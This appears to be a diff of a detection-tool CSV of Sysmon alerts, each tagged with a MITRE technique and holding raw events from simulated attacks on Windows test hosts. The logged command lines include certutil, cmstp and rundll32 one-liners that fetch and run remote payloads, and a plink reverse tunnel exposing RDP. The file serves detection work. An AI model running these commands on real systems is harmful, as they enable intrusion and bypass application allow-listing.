+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436075.337716,2019-07-30T01:34:35.337716+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm qc -q ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4990
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:35.246
+ 747F3D96-666B-5D3F-0000-001051638E00
+ 5840
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c winrm qc -q
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1553029831.815313,2019-03-20T01:10:31.815313+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966503
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 21:00:01.529
+ 365ABB72-5851-5C91-0000-00107D050A00
+ 2716
+ C:\Windows\System32\schtasks.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Manages scheduled tasks
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-528D-5C91-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ MD5=2003E9B15E1C502B146DAD2E383AC1E3,IMPHASH=D92C80D49382091310FB8DB089F856A9
+ 365ABB72-5851-5C91-0000-0010E1030A00
+ 2772
+ C:\Windows\System32\wsqmcons.exe
+ C:\Windows\System32\wsqmcons.exe
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,1564436070.807635,2019-07-30T01:34:30.807635+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4988
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:30.462
+ 747F3D96-6666-5D3F-0000-0010AE068E00
+ 1464
+ C:\Windows\System32\forfiles.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ ForFiles - Executes a command on selected files
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80
+ 747F3D96-6666-5D3F-0000-001016F78D00
+ 2244
+ C:\Windows\System32\cmd.exe
+ cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1553029201.518992,2019-03-20T01:00:01.518992+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966501
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:58:44.187
+ 365ABB72-5804-5C91-0000-001044DE0900
+ 2456
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-528D-5C91-0000-0020E7030000
+ 0x3e7
+ 2
+ System
+ MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-57FB-5C91-0000-00104FD40900
+ 2128
+ C:\osk.exe
+ "c:\osk.exe"
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436070.258082,2019-07-30T01:34:30.258082+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4986
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:30.221
+ 747F3D96-6666-5D3F-0000-001016F78D00
+ 2244
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436065.269897,2019-07-30T01:34:25.269897+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4983
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:25.180
+ 747F3D96-6661-5D3F-0000-00107AB88D00
+ 6428
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1564436065.202954,2019-07-30T01:34:25.202954+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\certutil.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 4982
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Suspicious NetCon
+ 2019-07-29 21:34:20.735
+ 747F3D96-665C-5D3F-0000-0010E37B8D00
+ 4520
+ C:\Windows\System32\certutil.exe
+ MSEDGEWIN10\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ MSEDGEWIN10.home
+ 49833
+
+ false
+ 151.101.0.133
+
+ 443
+ https
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1564436061.867545,2019-07-30T01:34:21.867545+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\certutil.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 4981
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Suspicious NetCon
+ 2019-07-29 21:34:20.619
+ 747F3D96-665C-5D3F-0000-0010E37B8D00
+ 4520
+ C:\Windows\System32\certutil.exe
+ MSEDGEWIN10\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ MSEDGEWIN10.home
+ 49832
+
+ false
+ 151.101.0.133
+
+ 443
+ https
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4980
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:20.410
+ 747F3D96-665C-5D3F-0000-0010E37B8D00
+ 4520
+ C:\Windows\System32\certutil.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ CertUtil.exe
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
+ 747F3D96-665C-5D3F-0000-0010096B8D00
+ 7088
+ C:\Windows\System32\cmd.exe
+ cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4980
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:20.410
+ 747F3D96-665C-5D3F-0000-0010E37B8D00
+ 4520
+ C:\Windows\System32\certutil.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ CertUtil.exe
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
+ 747F3D96-665C-5D3F-0000-0010096B8D00
+ 7088
+ C:\Windows\System32\cmd.exe
+ cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436060.262273,2019-07-30T01:34:20.262273+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4978
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:20.134
+ 747F3D96-665C-5D3F-0000-0010096B8D00
+ 7088
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);})",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4977
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:15.502
+ 747F3D96-6657-5D3F-0000-001011298D00
+ 1004
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-6657-5D3F-0000-001029198D00
+ 1808
+ C:\Windows\System32\cmd.exe
+ cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4977
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:15.502
+ 747F3D96-6657-5D3F-0000-001011298D00
+ 1004
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-6657-5D3F-0000-001029198D00
+ 1808
+ C:\Windows\System32\cmd.exe
+ cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4977
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:15.502
+ 747F3D96-6657-5D3F-0000-001011298D00
+ 1004
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-6657-5D3F-0000-001029198D00
+ 1808
+ C:\Windows\System32\cmd.exe
+ cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553029101.014473,2019-03-20T00:58:21.014473+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966480
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:58:20.894
+ 365ABB72-57EC-5C91-0000-001097810900
+ 2848
+ C:\Windows\System32\sdbinst.exe
+ 6.0.7600.16385 (win7_rtm.090713-1255)
+ Application Compatibility Database Installer
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\sdbinst.exe" -q "C:\Users\user01\Desktop\titi.sdb"
+ C:\Users\user01\Desktop\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
+ 365ABB72-551C-5C91-0000-001030590500
+ 2704
+ C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
+ "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436055.252183,2019-07-30T01:34:15.252183+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4975
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:15.202
+ 747F3D96-6657-5D3F-0000-001029198D00
+ 1808
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028767.484881,2019-03-20T00:52:47.484881+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966464
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:52:47.364
+ 365ABB72-569F-5C91-0000-0010D96C0800
+ 3140
+ C:\Windows\System32\sdbinst.exe
+ 6.0.7600.16385 (win7_rtm.090713-1255)
+ Application Compatibility Database Installer
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB "
+ C:\Windows\System32\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
+ 365ABB72-551C-5C91-0000-001030590500
+ 2704
+ C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
+ "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1550311342.965921,2019-02-16T14:02:22.965921+04:00,,Threat,High,User Name : ( PC01\IEUser ) with Command Line : ( plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test ) contain suspicious command ( plink.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1940899
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-02-16 10:02:21.934
+ 365ABB72-DFAD-5C67-0000-0010E0811500
+ 2312
+ C:\Users\IEUser\Desktop\plink.exe
+ Release 0.70
+ Command-line SSH, Telnet, and Rlogin client
+ PuTTY suite
+ Simon Tatham
+ plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test
+ C:\Users\IEUser\Desktop\
+ PC01\IEUser
+ 365ABB72-D6AB-5C67-0000-002056660200
+ 0x26656
+ 1
+ High
+ SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4
+ 365ABB72-D92A-5C67-0000-0010CB580900
+ 3904
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"))",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4971
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
